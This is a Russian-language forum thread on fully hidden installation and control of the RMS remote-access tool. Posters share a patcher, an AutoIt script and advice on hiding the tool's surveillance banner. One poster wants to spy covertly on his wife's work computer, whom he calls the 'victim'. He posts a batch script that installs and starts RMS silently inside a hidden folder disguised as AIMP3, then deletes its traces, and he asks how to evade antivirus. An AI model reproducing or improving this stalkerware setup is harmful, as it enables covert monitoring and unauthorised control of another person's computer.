RMS - полностью скрытая установка и управление.


iNET

Пользователь
Форумчанин
Регистрация
24.08.2016
Сообщения
4
В SFX в параметрах ставил запуск батника после распаковки. Между 32 и 64 - нет разницы.
С патчером все норм Держи ссылку -

Ссылка битая ...
 

Антоха

Уважаемый пользователь
Форумчанин
Регистрация
26.12.2012
Сообщения
2 780
Репутация
4 652
Нормальная ссылка. Это у вас какие-то разногласия с Мегой. Перезалил на Яндекс.
 
B

BladeUser

Гость
Нормальная ссылка. Это у вас какие-то разногласия с Мегой. Перезалил на Яндекс.
Подскажите пожалуйста, как этот патчер работает. Что я делаю:
- Копирую в распакованную скачанную папку с патчером екзешник установленного на PC rms
- Пытаюсь надрагенддропать его на форму патчера но ничего не происходит, типу галочки наотмечал, путь прописанный по дефолту совпадает с тем где у меня лежит екзешник rms тот что нужно пропатчить, НО
нету кнопки "пропатчить" или как-то так. Т.е. папка Patched не создается с пропатченым екзешником. Есть какая-то комбинация клавиш?
PS: Пояснюсь. Мне не нужна скрытая установка, генерация паролей и т.д. и т.п., мне нужно на скачанном с оффсайта rms просто отключить этот меседж "видеонаблюдение включено". Мои бабки-бухи пугаются этой фигни и боятся окна на эту надпись насовывать. У нас несколько вебок от компов на длинных USB прибиты на гвозди в углах комнаты и при входе, что бы смотреть что там происходит. Может кто подскажет как это проще можно сделать без всех этих патчеров и т.д. или как этим патчером пользоватся?
 
Последнее редактирование модератором:

Hooko

Уважаемый пользователь
Форумчанин
Регистрация
24.08.2016
Сообщения
230
Репутация
345
За этот банер отвечает один из 2 процессов RMS, сейчас не могу сказать точно - давно было. Так вот завершить надо который от юзера. И все! Баннера больше нет. Минус в том, что до следующей перезагрузки больше к хосту не подключится.
 

X-Shar

:)
Администрация
Регистрация
03.06.2012
Сообщения
6 085
Репутация
8 208
BladeUser, попробуйте мой скрипт из этого поста:RMS - полностью скрытая установка и управление.

Там исходник аутоит, думаю разбиретесь несложно !
 

X-Shar

:)
Администрация
Регистрация
03.06.2012
Сообщения
6 085
Репутация
8 208




Третья часть вроде как готовится, не плохие статьи ! :)
 
P

Proon

Гость
доброго время суток. прочитал весь форум и понял что создать сам не смогу скрытый rms для жертвы своей жены для ее рабочего компа. Блин чет там не то. Можете мне помочь. кому не жалко поделится готовым RMS что бы не палился антивирус. у меня есть одна конфигурация запаковываю в SFX но при установке bat файл палит антивирус.
конфигурация батника вот такая. Чем его заменить ?! Помогите плис очень прошу. Вед мир не без добрых людеф.
@echo off
taskkill /f /im rutserv.exe
taskkill /f /im rfusclient.exe
reg delete "HKLM\SYSTEM\Remote Manipulator System" /f
md "C:\Program Files (x86)\AIMP3"
attrib +s +h "C:\Program Files (x86)\AIMP3"

cd C:\Log

copy /y "rfusclient.exe" "C:\Program Files (x86)\AIMP3\rfusclient.exe"
copy /y "rutserv.exe" "C:\Program Files (x86)\AIMP3\rutserv.exe"
copy /y "vp8decoder.dll" "C:\Program Files (x86)\AIMP3\vp8decoder.dll"
copy /y "vp8encoder.dll" "C:\Program Files (x86)\AIMP3\vp8encoder.dll"
copy /y "regedit.reg" "C:\Program Files (x86)\AIMP3\regedit.reg"

cd C:\Program Files (x86)\AIMP3\

"rutserv.exe" /silentinstall
regedit /s regedit.reg
"rutserv.exe" /start

del /f /q C:\Program Files (x86)\AIMP3\regedit.reg

timeout 5
del /f /q "C:\Log\"
@exit
 
P

Proon

Гость
VaMpir1337,
Ребят. Короче создал свою сборочку отличную. Вот поставил на тест на свой компьютер. все работает логи отправляет и есть полное управление. Потом компьютер работает и Проходит 1-15 часа и RMS компьютер показывает что комп оффлайн, хоть он работает и подключен Интернету. Лечиться перезагрузкой. И снова все работает. Хочется исправить эту ошибку, в чем проблема?Жертва комп редко перезагружает, хоть хочется чтобы он работал постоянно без нареканий
привет вопрос на засыпку. Ты собрал все супер антивирусы не палят ?
 
Верх Низ